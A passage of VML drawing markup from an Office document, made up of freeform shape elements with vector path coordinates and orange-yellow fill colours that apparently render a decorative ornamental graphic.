path="m1013,21r10,18l1023,56r-15,34l1013,95r10,l1044,56r16,-17l1085,21r31,-8l1142,13r26,4l1199,30r10,9l1215,52r,25l1209,86r-15,4l1168,95r-15,-5l1142,82r,-9l1142,65r5,-5l1163,56r5,l1178,60r6,5l1184,73r5,9l1199,82r5,-17l1204,60r-5,-8l1194,43r-16,-4l1147,39r-25,13l1070,77r-52,31l992,121r-31,4l925,125r-36,-4l853,112,817,95,693,30,672,21r-16,l646,21r,5l646,30r5,4l677,39r21,13l734,77r21,26l770,134r5,30l775,194r-15,39l734,264r-47,60l636,376r-16,35l620,428r5,18l641,459r10,8l662,467r15,-4l682,454r,-4l682,446r-15,l656,446r-5,-5l651,437r,-13l662,415r10,l682,420r16,13l698,454r-5,5l682,472r-20,8l646,480r-10,l605,459,579,437r,-26l584,398r10,-13l605,376r,-4l594,368r-10,l579,363r15,-17l610,337r41,-17l667,307r5,-9l672,285r31,-8l718,268r6,-13l724,233r20,-8l755,203r,-17l744,173r-10,-5l724,173r,8l734,190r5,4l734,207r-5,5l724,216r-11,l698,220r,9l693,225r-11,l672,246r-10,-4l662,233r10,-13l672,212r-5,-5l651,212r-5,13l646,242r5,13l662,264r20,l693,251r5,-18l703,242r,4l698,259r-11,9l672,272r-10,5l651,285r-5,9l641,303r-21,4l605,307r-16,l579,298r-5,-4l563,298r-10,13l537,320r-25,l491,320,481,307,470,294r5,-22l481,264r,-9l470,255r-5,-4l444,251,424,229r-5,-9l419,203r10,-13l444,181r16,-4l470,173,460,151r,-13l465,129r5,-13l475,108,501,95r16,l527,99r26,13l568,95r6,-9l589,82r16,l620,86r16,4l646,103r5,9l646,121r-15,l615,125r-10,9l594,147r,17l605,181r5,9l625,194r21,l662,190r20,-9l693,164r5,-13l698,129r-5,-26l677,86,651,69,625,52,589,47r-31,l522,52,465,73,439,90r-20,22l398,134r-5,21l382,181r,26l382,233r11,26l398,285r21,22l455,355r-11,13l439,376r-31,18l362,363,336,346r-21,-4l289,333r-31,-4l233,329r-31,4l176,337r-21,9l108,372,77,407,67,428r-5,22l57,472r,21l67,519r16,22l98,562r26,13l134,580r21,4l170,580r11,-5l202,567r15,-22l222,536r,-8l212,510,196,498r-20,l155,506r-16,17l134,536r-20,-8l103,519,93,506r10,-17l114,476r5,-4l119,459r-11,-5l103,446r,-18l108,415r16,-8l139,398r16,l170,398r11,9l191,415r5,-4l202,407r,-13l202,385r15,-22l233,355r10,l258,355r16,4l284,372r11,9l300,407r10,4l315,407r21,l362,415r10,18l377,441r,13l372,472r-15,13l346,489r,9l362,506r10,9l372,528r-5,17l357,558r-11,4l336,562r-16,5l315,575r-5,18l300,610r-26,4l253,614r-15,9l222,627r-10,-4l202,614r-11,l191,623r5,9l212,640r15,5l243,645r31,-18l284,627r16,-4l320,606r16,-22l367,571r15,-9l388,549r10,-34l408,498r5,-5l424,489r5,4l429,502r5,8l444,515r31,-9l496,502r21,4l543,523r10,13l563,549r-10,26l548,588r-11,5l517,597r-5,-4l501,588r,-13l501,567r5,-5l512,558r15,4l537,562r,-13l517,536r-21,-8l460,536r-36,18l362,597r-62,43l264,653r-37,5l181,658r-47,-9l103,627,83,614,72,597,57,571,46,541r-5,-5l36,536r-5,18l36,567r10,26l67,632r26,34l139,740r11,30l155,801r-5,34l134,866r-5,13l72,931,57,948r-5,13l52,982r5,18l67,1008r16,9l103,1008r5,-4l114,995r-6,-4l103,991r-10,l83,991,72,978r5,-13l83,961r10,l108,961r11,8l129,987r,13l119,1013r-11,8l93,1026r-21,l57,1021,31,1008,15,987,10,961,26,939,41,918,67,900,93,883r,-4l93,874r-31,5l46,879,36,874,21,861,10,848,,831,,814,10,779,31,753,46,723r6,-18l52,688r20,26l88,740r10,30l103,796,77,792r-15,l52,796r-11,9l36,818r,9l41,840r16,17l72,866r16,l103,861r16,-17l129,827r5,-22l134,788r-5,-22l108,727,93,692,57,645,26,593,10,536,5,480r5,-34l26,415,46,385,72,363r47,-26l119,333r-5,-4l103,329r-15,l72,329,52,324,31,311,15,294,10,277,,246r5,-8l15,225,26,212r15,-9l77,194r31,5l129,212r10,21l134,255r-10,17l119,251r,-9l108,233r-5,-4l93,229r-21,4l57,246r-5,18l62,281r10,13l103,303r26,4l186,307r57,-4l269,307r26,4l357,342r51,30l419,368r5,-9l398,320,372,281,362,233r-5,-43l351,112,346,95,336,82,326,65,300,60r-16,l264,69,253,82r,13l253,103r11,9l284,121r31,-9l310,125r-15,9l284,138r-10,l243,134,227,116,217,95r,-22l227,52,243,39,264,21r20,-4l310,13r21,4l357,26r15,17l382,60r,13l382,90r-10,22l377,121r5,l393,112r5,-13l408,86r5,-13l439,52,465,39,491,26r26,-9l543,8,579,4r26,l641,8r83,26l806,65r78,38l925,112r26,l977,103,998,90r5,-13l1003,65,998,47r-6,-4l982,39,972,34r-11,l935,43r-5,9l925,60r,17l930,86,899,82,863,73,806,43r21,l842,39,879,26,915,13,956,r16,4l987,4r26,17xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1116,13;1153,90;1189,82;1018,108;646,21;775,194;662,467;662,415;605,459;594,346;744,225;729,212;662,242;682,264;646,294;512,320;424,229;470,116;620,86;605,181;677,86;393,155;408,394;108,372;134,580;176,498;119,459;191,415;284,372;372,472;336,562;202,614;300,623;429,493;553,575;527,562;264,653;36,536;134,866;108,1004;93,961;31,1008;46,879;52,688;36,827;129,766;72,363;10,277;134,255;62,281;419,368;300,60;295,134;284,17;382,121;579,4;1003,77;925,77;972,4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 287" o:spid="_x0000_s1311" style="position:absolute;left:8264;top:2919;width:1189;height:394;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="118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" path="m1168,4r21,13l1054,17r-424,l568,17r-5,9l563,116r-5,5l434,121r-62,8l315,138r-57,13l206,173r-51,26l108,233,72,272,46,311,5,394,,385,,372,5,350,20,316,46,281,72,246r31,-30l139,190r42,-22l222,147r41,-13l346,116r36,-4l424,108r113,-5l542,95,542,r626,4xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1168,4;1189,17;1054,17;630,17;568,17;563,26;563,116;558,121;434,121;372,129;315,138;258,151;206,173;155,199;108,233;72,272;46,311;5,394;0,385;0,372;5,350;20,316;46,281;72,246;103,216;139,190;181,168;222,147;263,134;346,116;382,112;424,108;537,103;542,95;542,0;1168,4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 288" o:spid="_x0000_s1312" style="position:absolute;left:7494;top:2936;width:25;height:4;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m25,l10,4,,4,5,r5,l25,xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,0;10,4;0,4;5,0;10,0;25,0" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 289" o:spid="_x0000_s1313" style="position:absolute;left:8279;top:2949;width:1225;height:493;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="122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" path="m1225,9r-15,17l1153,30r-543,l605,34r-5,104l465,138r-62,9l341,151r-62,13l222,186r-51,26l150,234r-26,21l104,281,83,312,67,338,57,368,42,433,31,493r-20,l5,489,,455,,424,5,394,16,359,42,299,78,242r36,-34l155,182r42,-26l243,138r47,-17l341,112r52,-4l445,108r57,l558,108r6,l569,r5,l1210,4r15,5xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1225,9;1210,26;1153,30;610,30;605,34;600,138;465,138;403,147;341,151;279,164;222,186;171,212;150,234;124,255;104,281;83,312;67,338;57,368;42,433;31,493;11,493;5,489;0,455;0,424;5,394;16,359;42,299;78,242;114,208;155,182;197,156;243,138;290,121;341,112;393,108;445,108;502,108;558,108;564,108;569,0;574,0;1210,4;1225,9" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 290" o:spid="_x0000_s1314" style="position:absolute;left:7426;top:2971;width:37;height:142;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3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" path="m11,34l6,64,16,86r5,26l37,138r-6,4l11,112,,82,,47,6,12,16,r,8l16,17,11,34xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,34;6,64;16,86;21,112;37,138;31,142;11,112;0,82;0,47;6,12;16,0;16,8;16,17;11,34" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 291" o:spid="_x0000_s1315" style="position:absolute;left:7623;top:2975;width:315;height:255;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3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" path="m103,30l93,26r-5,l77,30r,4l77,39r31,17l129,78r,4l124,91r-11,8l93,95,77,86,51,60r-5,5l41,69r21,35l77,121r26,4l124,125r21,-4l155,112r5,-8l160,82,134,56,108,30r16,13l145,56r15,17l170,91r,8l170,112r,9l181,125r20,-4l217,112r10,l243,121r15,13l274,160r5,26l294,216r21,39l248,225,176,203r-21,-8l150,186r-5,-9l145,164r10,-8l155,147r,-4l145,138r-11,5l119,143,98,134,57,99,36,78,20,52,,4,5,,57,13r20,8l103,30xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="93,26;77,30;77,39;129,78;124,91;93,95;51,60;41,69;77,121;124,125;155,112;160,82;108,30;145,56;170,91;170,112;181,125;217,112;243,121;274,160;294,216;248,225;155,195;145,177;155,156;155,143;134,143;98,134;36,78;0,4;57,13;103,30" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 292" o:spid="_x0000_s1316" style="position:absolute;left:9515;top:2971;width:25;height:25;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" path="m25,8r-5,9l10,25,,21,,17,,8,10,,20,4r5,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,8;20,17;10,25;0,21;0,17;0,8;10,0;20,4;25,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 293" o:spid="_x0000_s1317" style="position:absolute;left:8972;top:2996;width:72;height:100;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m67,18l46,39,36,44r-21,l15,52r6,l52,70,62,83r5,13l67,100,10,74,,65,,61,,44,15,31,31,22,52,13,62,,72,9r-5,9xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="67,18;46,39;36,44;15,44;15,52;21,52;52,70;62,83;67,96;67,100;10,74;0,65;0,61;0,44;15,31;31,22;52,13;62,0;72,9;67,18" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 294" o:spid="_x0000_s1318" style="position:absolute;left:7468;top:300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" path="m31,26r-5,l20,21,,8,,,31,26xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,26;26,26;20,21;0,8;0,0;31,26" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 295" o:spid="_x0000_s1319" style="position:absolute;left:8341;top:3001;width:78;height:65;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m73,65r-16,l47,60,26,52,11,26,,,26,17r26,9l62,34r11,5l78,52,73,65xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="73,65;57,65;47,60;26,52;11,26;0,0;26,17;52,26;62,34;73,39;78,52;73,65" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 296" o:spid="_x0000_s1320" style="position:absolute;left:8119;top:3005;width:57;height:95;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m57,13r,9l47,26,36,30r-5,9l21,56r,13l26,82r10,5l36,91,21,95,10,91,5,69,,48,,30,21,9,26,,41,,52,4r5,9xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,13;57,22;47,26;36,30;31,39;21,56;21,69;26,82;36,87;36,91;21,95;10,91;5,69;0,48;0,30;21,9;26,0;41,0;52,4;57,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 297" o:spid="_x0000_s1321" style="position:absolute;left:8047;top:3018;width:62;height:78;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m62,22r,8l51,30r-5,l36,22,31,17r-6,l20,26r5,13l41,52r15,9l62,78r-16,l31,69,10,43,,26,,17,10,9,20,,36,,51,9,62,22xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="62,22;62,30;51,30;46,30;36,22;31,17;25,17;20,26;25,39;41,52;56,61;62,78;46,78;31,69;10,43;0,26;0,17;10,9;20,0;36,0;51,9;62,22" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 298" o:spid="_x0000_s1322" style="position:absolute;left:9065;top:3009;width:36;height:26;visibility:visible;mso-wrap-style:square;v-text-anchor:top"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" path="m36,18r,4l31,26,15,22,,9,,,21,9r15,9xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,18;36,22;31,26;15,22;0,9;0,9;0,0;21,9;36,18" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 299" o:spid="_x0000_s1323" style="position:absolute;left:7463;top:3031;width:175;height:65;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m56,13r,-9l113,17r26,9l170,26r5,4l170,39r-10,9l139,56r-31,5l72,61,41,65r-10,l20,61r,-9l51,52,67,48r10,l82,30r,-4l72,22,31,17,,4,5,,31,9r15,8l56,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="56,13;56,4;113,17;139,26;170,26;175,30;170,39;160,48;139,56;108,61;72,61;41,65;31,65;20,61;20,52;51,52;67,48;77,48;82,30;82,26;72,22;31,17;0,4;5,0;31,9;46,17;56,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 300" o:spid="_x0000_s1324" style="position:absolute;left:8920;top:3031;width:31;height:26;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m31,13l26,26r-5,l16,26,5,22,,17,,9,11,,26,4r5,9xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;21,26;16,26;5,22;0,17;0,9;11,0;26,4;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 301" o:spid="_x0000_s1325" style="position:absolute;left:9106;top:3035;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" path="m36,13r-5,9l21,22r-10,l,13,21,,31,5r5,8xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,22;11,22;0,13;21,0;31,5;36,13" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 302" o:spid="_x0000_s1326" style="position:absolute;left:9029;top:3035;width:46;height:26;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m46,13l31,22,20,26r-5,l5,18,,9,15,r5,l36,5r10,8xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="46,13;31,22;20,26;15,26;5,18;0,9;15,0;20,0;36,5;46,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 303" o:spid="_x0000_s1327" style="position:absolute;left:9173;top:304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" path="m21,4l16,8r,5l6,8,,4,6,,16,r5,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,4;16,8;16,13;6,8;0,4;6,0;16,0;21,4" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 304" o:spid="_x0000_s1328" style="position:absolute;left:7468;top:3057;width:26;height:9;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m26,4l20,9,5,9,,,15,,26,4xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,4;20,9;5,9;0,0;15,0;26,4" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 305" o:spid="_x0000_s1329" style="position:absolute;left:9065;top:30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" path="m31,9l15,18,5,18,,18,15,,26,r5,l31,9xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,9;15,18;5,18;0,18;15,0;26,0;31,0;31,9" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 306" o:spid="_x0000_s1330" style="position:absolute;left:8005;top:3096;width:119;height:52;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m114,22r5,4l114,30r-10,l93,26,67,17,42,13,31,17r-5,5l31,30r11,5l52,35r5,l62,39,52,48,42,52,26,48,5,35,,22,5,9,21,,42,,78,4r36,18xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="114,22;119,26;114,30;104,30;93,26;67,17;42,13;31,17;26,22;31,30;42,35;52,35;57,35;62,39;52,48;42,52;26,48;5,35;0,22;5,9;21,0;42,0;78,4;114,22" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 307" o:spid="_x0000_s1331" style="position:absolute;left:7788;top:3105;width:88;height:73;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m83,17r5,17l88,52,67,69,47,73r-21,l5,60,,47,5,30,16,26r5,4l21,43r,4l31,56r11,l52,52,62,39r,-13l62,21,57,17,42,21,31,17r,-4l36,4,52,,62,4,78,8r5,9xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="83,17;88,34;88,52;67,69;47,73;26,73;5,60;0,47;5,30;16,26;21,30;21,43;21,47;31,56;42,56;52,52;62,39;62,26;62,21;57,17;42,21;42,21;31,17;31,13;36,4;52,0;62,4;78,8;83,17" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 308" o:spid="_x0000_s1332" style="position:absolute;left:7530;top:3109;width:15;height:1351;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="15,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" path="m10,9r5,1268l15,1316r-5,18l,1351r,-78l,4,10,r,4l10,9xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,9;15,1277;15,1316;10,1334;0,1351;0,1273;0,4;10,0;10,4;10,9" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 309" o:spid="_x0000_s1333" style="position:absolute;left:7483;top:3118;width:21;height:1381;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m21,1381l,1372r,-4l,1355r,-17l,1312r,-31l,1247r,-44l,1160r,-52l,1056,,939,,818,,693,,567,,441,,324,,273,,225,,177,,134,,99,,69,,43,,26,,13,21,r,13l21,30r,30l21,91r,34l21,169r,43l21,264r,56l21,437r,126l21,688r,130l21,944r,117l21,1113r,56l21,1212r,43l21,1290r,30l21,1351r,13l21,1381xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,1381;0,1372;0,1368;0,1355;0,1338;0,1312;0,1281;0,1247;0,1203;0,1160;0,1108;0,1056;0,939;0,818;0,693;0,567;0,441;0,324;0,273;0,225;0,177;0,134;0,99;0,69;0,43;0,26;0,13;0,13;21,0;21,0;21,13;21,30;21,60;21,91;21,125;21,169;21,212;21,264;21,320;21,437;21,563;21,688;21,818;21,944;21,1061;21,1113;21,1169;21,1212;21,1255;21,1290;21,1320;21,1351;21,1364;21,1381;21,1381" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 310" o:spid="_x0000_s1334" style="position:absolute;left:8057;top:3131;width:155;height:82;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m129,8l119,26r-5,13l119,52r5,4l129,56r5,-9l145,47r5,l155,52r-5,13l134,78r-5,l119,73,109,65,98,56r,-9l98,21,67,26,36,30,26,43r-5,9l26,56r5,4l41,60,52,52,62,47r5,l72,60,62,65,46,78,36,82r-10,l10,78,,60,,43,10,30,31,17,52,8r25,l98,8r,9l114,4,124,r5,8xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="129,8;119,26;114,39;119,52;124,56;129,56;134,47;145,47;150,47;155,52;150,65;134,78;129,78;119,73;109,65;98,56;98,47;98,21;67,26;36,30;26,43;21,52;26,56;31,60;41,60;52,52;62,47;67,47;72,60;62,65;46,78;36,82;26,82;10,78;0,60;0,43;10,30;31,17;52,8;77,8;98,8;98,17;114,4;124,0;129,8" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 311" o:spid="_x0000_s1335" style="position:absolute;left:7974;top:3256;width:135;height:113;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m135,13r,9l129,31,109,48,62,83,21,113,11,109,,104,21,78,52,52,109,5,119,r5,l135,13xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="135,13;135,22;129,31;109,48;62,83;21,113;11,109;0,104;21,78;52,52;109,5;119,0;124,0;135,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 312" o:spid="_x0000_s1336" style="position:absolute;left:7783;top:3282;width:62;height:10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" path="m57,18r5,17l62,52,52,57,47,35,36,26,26,22r-5,l16,31r5,17l26,61,47,96r,4l41,100,21,78,,48,,31,,13,16,,31,,47,9r10,9xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,18;62,35;62,52;52,57;47,35;36,26;26,22;21,22;16,31;21,48;26,61;47,96;47,100;41,100;21,78;0,48;0,31;0,13;16,0;31,0;47,9;57,18" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 313" o:spid="_x0000_s1337" style="position:absolute;left:8041;top:3317;width:57;height:48;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m57,4l6,48,,48,26,22,42,9,57,r,4xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,4;6,48;0,48;26,22;42,9;57,0;57,4" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 314" o:spid="_x0000_s1338" style="position:absolute;left:7680;top:3321;width:98;height:57;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m98,44r,8l93,52,62,31,46,18r-5,l25,22r-5,4l25,35r11,4l41,44,36,57,20,52,5,35,,22,,13,10,5,20,,46,,67,13,88,26,98,44xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="98,44;98,52;93,52;62,31;46,18;41,18;25,22;20,26;25,35;36,39;41,44;36,57;20,52;5,35;0,22;0,13;10,5;20,0;46,0;67,13;88,26;98,44" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 315" o:spid="_x0000_s1339" style="position:absolute;left:8419;top:3321;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" path="m26,39r-16,l,26,,,26,18r5,8l31,35r-5,4xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,39;10,39;0,26;0,0;26,18;31,26;31,35;26,39" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 316" o:spid="_x0000_s1340" style="position:absolute;left:7845;top:3326;width:78;height:86;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m72,13r6,4l78,26,72,43r-5,9l57,52,52,43r,-13l52,17r-5,l36,17,21,34r,18l21,86r-5,l10,86,5,65,,47,5,26,16,13,31,4,36,,57,4r15,9xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="72,13;78,17;78,26;72,43;67,52;57,52;52,43;52,30;52,17;47,17;36,17;21,34;21,52;21,86;16,86;10,86;5,65;0,47;5,26;16,13;31,4;36,0;57,4;72,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 317" o:spid="_x0000_s1341" style="position:absolute;left:8072;top:3330;width:461;height:394;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="46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" path="m455,13r6,9l455,26r-10,9l435,35r-6,-9l429,17,414,30r-5,13l404,74r,25l393,125r-15,26l352,169r-31,13l295,182r-36,l228,173,176,143,130,108r-5,l119,112r68,70l212,221r6,17l218,260r,21l207,303r-15,13l166,329r-16,9l130,342r-42,l47,346r-16,9l16,364r5,8l26,372r11,l37,368r10,4l42,381,31,394r-20,l6,394,,385,,372r,-8l16,342r15,-9l52,333r36,-8l83,316r-10,l57,307,47,294,42,281r,-17l47,255,62,238,83,225r26,4l130,234r10,13l140,251r,4l125,251r-11,l104,255r-10,9l94,273r,8l119,299r11,4l145,299r21,-5l176,286r16,-31l192,229r-5,-26l171,182,156,160r-11,-4l145,160r5,17l161,199r10,17l171,238r-5,17l156,208,145,186,130,164,104,130,73,99,6,48,37,13r93,73l181,112r26,13l238,138r47,5l264,143r-26,l187,125r-11,5l192,143r20,8l238,160r26,4l295,160r26,-9l342,134r5,-13l347,104,336,91,326,82r-26,l295,91r-10,8l285,117r-11,l269,112,264,99r,-21l264,61,280,48r15,-9l326,35r26,8l373,56r5,9l378,74r5,8l393,82r,-8l393,61,388,48r,-13l404,13r5,-9l424,r21,4l455,13xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="455,26;429,26;409,43;393,125;321,182;228,173;125,108;212,221;218,281;166,329;88,342;16,364;37,372;42,381;6,394;0,364;52,333;73,316;42,281;62,238;130,234;140,255;104,255;94,281;145,299;192,255;171,182;145,160;171,216;156,208;104,130;37,13;207,125;264,143;176,130;238,160;321,151;347,104;300,82;285,117;264,99;280,48;352,43;378,74;393,74;388,35;424,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 318" o:spid="_x0000_s1342" style="position:absolute;left:7876;top:3365;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" path="m5,r,l,4,,,5,xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5,0;5,0;0,4;0,4;0,0;5,0" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 319" o:spid="_x0000_s1343" style="position:absolute;left:7674;top:3378;width:94;height:51;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m94,13l62,17,21,51,11,47,,38,11,21,21,4,42,,52,,83,,94,13xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="94,13;62,17;21,51;11,47;0,38;11,21;21,4;42,0;52,0;83,0;94,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 320" o:spid="_x0000_s1344" style="position:absolute;left:8243;top:3391;width:16;height:34;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m16,34r-6,l,30,,21,5,8,16,r,34xe" fillcolor="#ff9e00" stroked="f">
